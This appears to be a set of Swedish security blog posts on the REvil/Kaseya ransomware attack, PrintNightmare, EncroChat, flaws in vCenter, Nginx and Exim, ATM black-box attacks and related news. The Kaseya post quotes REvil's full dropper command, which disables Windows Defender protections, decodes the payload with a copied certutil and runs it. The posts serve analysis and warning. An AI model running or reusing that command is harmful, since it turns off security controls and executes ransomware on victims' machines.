Så genomfördes ransomware-attacken mot Coop

Så genomfördes ransomware-attacken mot Coop

Coop använder sig av en leverantör vid namn Visma Esscom (Visma Retail, Extenda) som i sin tur använder en mjukvara vid namn Kaseya. Denna mjukvara kan användas för fjärrstyrning och uppdatering av mjukvara.

Kaseya levererar en on-prem server vid namn Kaseya VSA som också går att köra som SaaS. Denna mjukvara har utsatts för intrång och troligtvis placerades en bakdörr i uppdateringsrutinen för Kaseya VSA.

Därför rekommenderar Kaseya att man helt stänger av sin Kaseya VSA-server för att angriparna tar bort övrig administrativ access till denna för att låsa ute ”riktiga administratörer”.

Bakom attacken står ransomgruppen REvil som lyckats via denna väg ta sig in på ett 40-tal kunder till Kaseya. Dessa kunder såsom Visma Esscom har i sin tur vidare mängder med kunder. Andra företag som drabbats är  Synnex Corp. och Avtex LLC.

Lösensumma ligger på ca 400000 kr för enskilda system enligt källor till Bloomberg och en annan summa som nämnts är 42M SEK till Bleepingcomputer om man vill låsa upp samtliga. Och attacker mot managed service providers (MSP) är synnerligen allvarliga då det kan drabba otroligt många organisationer, såsom fallet med SolarWinds.

Kaseya VSA skriver en fil vid namn agent.crt till katalogen c:\kworking när en uppdatering vid namn Kaseya VSA Agent Hot-fix installeras.

Hur agent.crt avkodas och resulterar i agent.exe som startas hittar du här:

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Källa: Reddit

Agent.exe är i sin tur signerad av organisationen PB03 TRANSPORT LTD:

VirusTotal länk för agent.exe hittar du här, och Any.run här och pressrelease från Visma hittar du här.

SHA-256 för agent.exe: d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

Och för mpsvc.dll: 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd som är en av flera filer som ingår i droppern agent.exe.

Konfigurationsfil för REvil hittar du på Github här och en AHQ för Microsoft 365 här.

Uppdatering2: Ett steg som varit inte helt klart i ovan beskrivning är huruvida det var en automatisk uppdatering eller en faktiskt sårbarhet i Kaseya VSA som utnyttjas. Nya spår visar på att det var en sårbarhet som utnyttjas på grund av att VSA-servern är ansluten direkt mot internet.

Uppdatering: Det kan vara så att flertalet system är krypterade med samma publika nyckel. Det innebär att om en organisation betalar så kan flertalet dra nytt av detta:

Allvarlig sårbarhet i Windows-printspooler ”PrintNightmare”

Uppdatering: Korrekt CVE för denna nya sårbarhet är CVE-2021-34527.

Om du har ”Print Spooler”-tjänsten aktiverad (vilket är standard) innebär det att vem som helst med åtkomst kan exekvera kod som SYSTEM mot Windows-domänkontrollanten. I dagsläget finns det ingen patch från Microsoft.

Så gör ett uppehåll i din semester och stäng av tjänsten omedelbart. Från Tenables blogg:

Exploitation of CVE-2021-1675 could give remote attackers full control of vulnerable systems. To achieve RCE, attackers would need to target a user authenticated to the spooler service. Without authentication, the flaw could be exploited to elevate privileges, making this vulnerability a valuable link in an attack chain.

Video på PoC:

https://twitter.com/gentilkiwi/status/1410066827590447108?s=20

Mer information hos Microsoft: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675

Och här finns en fungerade exploit av cube0x0:

Google lanserar SLSA

Google logo

Google lanserar nu ett nytt ramverk för säkrare Supply Chain Cyber Security. Detta ramverk har fått namnet SLSA: Supply-chain Levels for Software Artifacts och uttalas salsa. Ramverket består av tre olika delar enligt följande:

  1. En gemensam standard som industrin har enats om
  2. En process för att granska och ackreditera ovan standard
  3. Tekniska kontroller för att övervaka ursprung och upptäcka eller förhindra överträdelser

Även finns det fyra olika säkerhetsnivåer:

Google har även dokumenterat några av de attacker som kan drabba en supply-chain enligt följande bild:

Jag tycker det är ett bra initiativ av Google och att det finns mer att läsa i Googles SRE Book samt BAB (Binary Authorization for Borg). Måste även passa på att rekommendera Security Scorecards som är ett projekt för att beräkna säkerheten på open-source projekt, testa och läs mer här:

Så knäcktes EncroChat av polisen

Jag kommer i detta blogginlägg försöka att göra en kvalificerad gissning om hur den franska polisen lyckades knäcka den krypterade chattjänsten EncroChat.

Det mest troliga scenariot är att polisen tog över centrala delar av infrastrukturen såsom uppdateringsservrar och introducerade helt enkelt en ny uppdatering till telefonen som innehöll en bakdörr som möjliggjorde avtappning av meddelanden.

Totalt rör det sig om 68 miljoner meddelanden 32477 telefoner från 121 länder som har tappats av (avlyssnats). Och läser man i rapporten från svenska polisens analysprojekt Robinson så kan vi läsa följande:

Ungefär 40 procent av användarna befann sig i Sverige under den aktuella tidsperioden och knappt 15 procent befann sig utomlands. För övriga saknas information. 

Vilket gör att vi kan dra slutsatsen att polisen i Sverige fått ta del av meddelanden som skrivits på svenska och att viss geografisk information finns med. För bakdörren innehöll troligtvis en modul som samlade in information om närliggande WiFI-accesspunkter och så nyttjades denna information som lokalisering.

Det utfärdades även franska domstolsordrar om att EncroChat.ch skulle förbli uppe och fungerande vilket stärker tesen att den bakdörr som polisen introducerade försvagade de kryptografiska egenskaperna i mobiltelefonen via en central uppdatering. Domstolsordern skickades till leverantörerna Gandhi SAS, DNS Made Easy och OVH.

EncroChats servrar stod troligtvis i OVH:s datacenter i staden Roubaix där bakdörren fysiskt las in.

Intressant är också att telefonerna är från av typen BQ Aquaris X2 och hade GPS samt mikrofon, USB-port bortplockad. Därav metoden ovan gällande WiFi som metod för att lokalisera telefonerna.

När personerna bakom EncroChat fick nys om polisens operation och att det fanns bakdörrar installerade i telefonerna så skickades följande meddelande ut till samtliga telefoner:

Enligt vissa källor så las bakdörren på ca 50% av alla EnroChat-telefoner som fanns i omlopp. Samt så las den in i flertalet olika steg genom flertalet uppdateringar där den första uppdateringen skulle göra så att polisen kunde ta sig förbi PIN-kodsskyddet och att telefonen inte skulle raderas om fel kod skrevs in för många gånger:

In May, Motherboard reports, some Encrochat users started to have problems with that wipe feature. At first, Encrochat assumed it was user error or a rogue bug. In May, the company got its hands on one of the X2 devices with the problem and discovered the issue was not user error. Instead, it was malware that not only prevented the wipe but also recorded screen lock passcodes and cloned application data.

Efter att EncroChat-nätverket togs över så använder kriminella troligtvis nu andra lösningar såsom MPC, Phantom, Ciphr, Myntex, Omerta och numera även knäckta SkyECC. Jag har även tidigare skrivit om krypterade lösningarna Ironbox och Ennetcom.

Tre andra teser som också är tänkbara men enligt mig mindre troliga:

  1. Företrädarna för EnrcoChat gjorde en deal med polisen om straffreduktion etc och hjälpte således till att lägga in en bakdörr
  2. Polisen identifierade en brist/svaghet som utnyttjades. Denna tes är även mycket närbesläktad med den tes jag presenterar ovan, men värt att känna till är att dessa system och många krypterade system inte är byggda för att klara av en aktör som har legala möjligheter att erhålla signeringsnycklar av uppdateringar eller fysisk access till servrar inom datacenters och utvecklande företag.
  3. Telefoner således med bakdörren redan implementerad. Vilket är det mest troliga scenariot i ett annat närliggande fall, nämligen SkyECC

Jag tror inte att den franska eller holländska polisen själva har kompetens att införa denna bakdörr utan har fått hjälp av en annan expertinstans såsom DGSE. Avlyssningen pågick mellan April och Juni 2020 men planeringen började redan 2017 samt gick under kodnamnet Emma 95.

Ny allvarlig vCenter-sårbarhet

Årets andra allvarliga sårbarhet till VMware vCenter har nu identifierats. Denna har en CVSS score på 9.8 vilket är synnerligen allvarligt. Gäller vCenter-versioner 6.5, 6.7 och 7.0, samt så finns det en workaround och en patch släppt för att åtgärda sårbarheten (jag skrev om den tidigare sårbarheten här).

Beskrivning från VMware enligt följande:

The affected Virtual SAN Health Check plug-in is enabled by default in all vCenter Server deployments, whether or not vSAN is being used.

Sårbarheten identifierades av Ricter Z på 360 Noah Lab.

Läs mer hos VMware här:

https://www.vmware.com/security/advisories/VMSA-2021-0010.html

Samt följande blogginlägg. Sårbarheten heter VMSA-2021-0010 hos VMware och har fått CVE-2021-21985 samt CVE-2021-21986.

Ny remote-sårbarhet i Nginx

Ny remote-sårbarhet i Nginx

En sårbarhet har identifierats i den populära webbservern Nginx. Sårbarheten har och göra med hur DNS-svar hanteras av Nginx och kräver således att du har ett resolver-direktiv konfigurerat i din konfigurationsfil.

”A security issue in nginx resolver was identified, which might allow an
attacker to cause 1-byte memory overwrite by using a specially crafted
DNS response, resulting in worker process crash or, potentially, in
arbitrary code execution (CVE-2021-23017).”

Sårbarheten gäller version 0.6.18 till 1.20.0 och är åtgärdad i version 1.21.0 samt 1.20.1. Just Nginx används av 34% av alla världens webbservrar. Så detta är synnerligen allvarlig och du bör uppdatera/patcha snarast.

Så här ser statistiken ut enligt w3techs:

Usage statistics of web servers

Nginx-sårbarheten identifierades av Luis Merino, Markus Vervier, Eric Sesterhenn från företaget X41 D-Sec GmbH.

Oklart i dagsläget om det går att utnyttja denna sårbarhet till att erhålla RCE, men troligtvis är det möjligt (Remote Code Execution).

Uppdatering: Mer information finns nu tillgänglig i denna advisory från X41 D-Sec:

Källa

Så hackas en bankomat

De senaste åren har antalet attacker mot bankomater ute i samhället ökat här i Sverige. Attackerna började för nästan tio år sedan och då främst i andra länder där bankomaterna inte varit lika fysiskt skyddade. Förutom att ge sig på bankomaten fysiskt så kan även skimming-attacker förekomma där kort och kod läses av, men det är utanför detta blogginlägg.

Black Box-attack är en del av den typen av attacker som generellt kallas för jack-potting där en angripare kan göra så att bankomaten ”sprutar ut sedlar”. Och eftersom hanteringen av sedlar minskar i samhället så blir bankomater således ett större intresse för kriminella.

Att det kallas för black box är för att angriparen lyckas koppla in någon form av enhet till bankomaten, dvs en svart låda. Vad denna svarta låda innehåller kan exempelvis vara en Raspberry Pi eller laptop som innehåller en specialskriven mjukvara för att prata med sedelutmataren.

Två exempel på sådana mjukvaror är Cutlet Maker eller KoffeyMaker och finns att köpa på svarta marknaden/darknet för runt 30000 SEK.

Skärmdump från sajt som säljer Cutlet Maker:

Troligtvis är dessa mjukvaror en modifierad version av KDIAG som tillverkas av Diebold Nixdorf (tidigare Wincor Nixdorf). De kriminella lurar även varandra och det finns en keygen till Cutlet Maker som går under namnet c0decalc. Ytterligare så nyttjar dom en mjukvara vid namn Stimulator application som kan läsa information om valörer och liknande från sedelkassetten.

Denna skärmdump hittade jag i ett förundersökningsprotokoll från polisen där en black-box attack genomförts via en laptop som fjärrstyrs av TeamViewer:

Wincor Noxdorf KDIAG 2.6 Setup

Således så kombinerar de kriminella ett fysiskt inbrott på bankomaten med mjukvara som fjärrstyr sedelutmataren.

Enligt Wikipedia så finns det cirka 2500 bankomater (uttagsautomater) i Sverige och många av dessa står på ett sådant sätt att kriminella kan angripa dem nattetid. Vi kan hoppas att företagen som tillverkar dessa maskiner lär sig om vilka metoder de kriminella använder och täpper till hålen skyndsamt.

Om för mycket våld används mot automaten så kommer sedlarna att bli färgade och därför antar jag att mjukvaruattacker mot bankomater nyttjas i större och större utsträckning.

Många av dessa attacker förevisades bl.a. år 2010 på Blackhat-konferensen av cybersäkerhetsforskaren Barnaby Jack och som tyvärr dog några år senare.

Qualys identifierar 21 sårbarheter i Exim

Det amerikanska cybersäkerhetsföretaget Qualys har identifierat 21 st sårbarheter i mail-servermjukvaran Exim. Tre av dessa 21 sårbarheter lyckades Qualys utnyttja som RCE:er (Remote Code Execution). Vilket är synnerligen allvarligt. Rekommenderat är att uppgradera till senaste versionen av Exim som i skrivande stund är 4.94.2.

RCE-sårbarheterna medger att en antagonist kan erhålla rättigheter över nätverket som exim-användaren. Det är inte heller första gången som Qualys hittar RCE:er i Exim. För 2019 så hittade man även ”return of the Wizard RCE”. En sårbarhet som utnyttjas av ryska hackergrupperingen Sandworm.

Tittar vi på en sökning med Shodan.io så hittar vi ca 1.7 miljoner sårbara installationer varav ca 7000 är i Sverige (länk).

Sårbarheterna är enligt följande:

- CVE-2020-28007: Link attack in Exim's log directory
- CVE-2020-28008: Assorted attacks in Exim's spool directory
- CVE-2020-28014: Arbitrary file creation and clobbering
- CVE-2021-27216: Arbitrary file deletion
- CVE-2020-28011: Heap buffer overflow in queue_run()
- CVE-2020-28010: Heap out-of-bounds write in main()
- CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()
- CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()
- CVE-2020-28015: New-line injection into spool header file (local)
- CVE-2020-28012: Missing close-on-exec flag for privileged pipe
- CVE-2020-28009: Integer overflow in get_stdinput()
Remote vulnerabilities
- CVE-2020-28017: Integer overflow in receive_add_recipient()
- CVE-2020-28020: Integer overflow in receive_msg()
- CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()
- CVE-2020-28021: New-line injection into spool header file (remote)
- CVE-2020-28022: Heap out-of-bounds read and write in extract_option()
- CVE-2020-28026: Line truncation and injection in spool_read_header()
- CVE-2020-28019: Failure to reset function pointer after BDAT error
- CVE-2020-28024: Heap buffer underflow in smtp_ungetc()
- CVE-2020-28018: Use-after-free in tls-openssl.c
- CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()

Du kan läsa advisoryn från Qualys i sin helhet här:

Så genomför rysk underrättelsetjänst cyberattacker

FBI DHS Cozy Bear

Amerikanska FBI har tillsammans med DHS släppt en publikation om hur IT-system kan skyddas mot cyberattacker från Ryska federationens underrättelsetjänst (SVR).

Rapporten tar upp den skadliga koden WELLMESS som använts för att stjäla information från företag som har med COVID-19 att göra. Bakom WellMess står grupperingen Blue Kitsune som även går under APT 29, Cozy Bear, Yttrium eller the Dukes som attribueras till rysk underrättelsetjänst.

Även påpekar man i rapporten att APT29 sedan 2018 fokuserar på att lågintensivt testa lösenord och angripa Office 365. Även tar man upp CVE-2019-19781 som då var en zero-day sårbarhet i Citrix NetScaler som använts för att ta sig in i nätverk.

Också intressant är att man nämner SolarWinds och hur modus operandi efterliknar SVR. Bland annat följande:

The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions. 

Några av tipsen från DHS och FBI lyder enligt följande:

  • Granskning av loggfiler för att identifiera försök att få tillgång till certifikat och skapa falska identifieringsleverantörer.
  • Använd programvara för att identifiera misstänkt beteende på system, inklusive körning av kodad PowerShell.
  • Implementera klientmjukvara med möjlighet att övervaka beteendemässiga indikatorer på intrång.
  • Försök att identifiera autentiseringsmissbruk inom molnmiljöer.
  • Konfigurera autentiseringsmekanismer för att bekräfta vissa användaraktiviteter på system, inklusive registrering av nya enheter.

Intressant också att man nämner zero-trust och loggkorrelation som åtgärder som kan försvåra för ryska cyberangripare.

Rapporten går att ladda hem här i sin helhet (pdf):

Säkerhetsbrister placerade i Linux-kerneln

En forskningsgrupp vid University of Minnesota (UMN) har undersök om det är möjligt att med flit introducera nya säkerhetsbrister i open-source projekt såsom Linux-kerneln. Just denna forskning har väckt en hel del reaktioner om hur etiskt och moraliskt denna typ av forskning är och samtliga patchar till Linux-kerneln från någon med UMN-epost har dragits tillbaka. Dock så genomfördes dessa illasinnade patchar med någon random-gmail.

Men frågeställningen är så klart intressant. Skulle det vara möjligt för en illasinnad aktör att lägga in sårbarheter medvetet i open-source projekt? Ja, givetvis är det möjligt. Men förhoppningsvis så granskas koden av flertalet ögon innan den gör någon skada. Och just detta är både fördelen och nackdelen med open-source projekt, se bara den PHP-bakdörr som försökte läggas in förra månaden.

How much review a subsystem maintainer does ends up coming down to trust. If driver maintainer is submitting consistently good patches, they may be trusted to submit their patches with less review.

Laura Labbott (källa)

Dock gick forskningen inte så bra och de tre sårbarheter som teamet försökte att introducera så gick ingen igenom (källa):

– UAF case 1, Fig. 11 => crypto: cavium/nitrox: add an error message to explain the failure of pci_request_mem_regions, https://lore.kernel.org/lkml/20200821031209.21279-1-acostag…. The day after this patch was merged into a driver tree, the author suggested calling dev_err() before pci_disable_device(), which presumably was their attempt at maintainer notification; however, the code as merged doesn’t actually appear to constitute a vulnerability because pci_disable_device() doesn’t appear to free the struct pci_dev.

– UAF case 2, Fig. 9 => tty/vt: fix a memory leak in con_insert_unipair, https://lore.kernel.org/lkml/20200809221453.10235-1-jameslou… This patch was not accepted.

– UAF case 3, Fig. 10 => rapidio: fix get device imbalance on error, https://lore.kernel.org/lkml/20200821034458.22472-1-acostag…. Same author as case 1. This patch was not accepted.

Och denna kommentar är också rätt intressant: